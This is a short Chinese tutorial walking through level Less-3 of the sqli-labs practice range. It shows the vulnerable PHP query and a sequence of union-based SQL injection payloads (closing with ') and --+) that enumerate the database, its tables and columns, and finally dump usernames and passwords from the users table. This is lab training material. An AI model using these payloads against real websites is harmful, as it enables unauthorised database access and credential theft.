第三关-Less-3:

合集 - Sqli-Labs(7)

1.sqli-labs靶场第一关-Less-1:2023-12-282.第二关-Less-2:2024-01-31

3.第三关-Less-3:2024-01-31

4.第四关-Less-4:2024-02-015.第五关-Less-5:2024-02-026.第六关-Less-6:2024-02-027.第七关-Less-7:2024-02-22

收起

第三关-Less-3 ：

GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)：

判断注入点：

当我们在输入?id=1'的时候看到页面报错信息。可推断sql语句是单引号字符型且有括号，所以我们需要闭合单引号且也要考虑括号。

这时我们来查看源码的关键部分：

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

这里发现确实是我们的闭合符号不一样

然后根据条件来构造我们的payload：

?id=2')--+

?id=1') order by 3--+

?id=-1') union select 1,2,3--+

?id=-1') union select 1,database(),version()--+

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=-1') union select 1,2,group_concat(username ,id , password) from users--+

注入成功！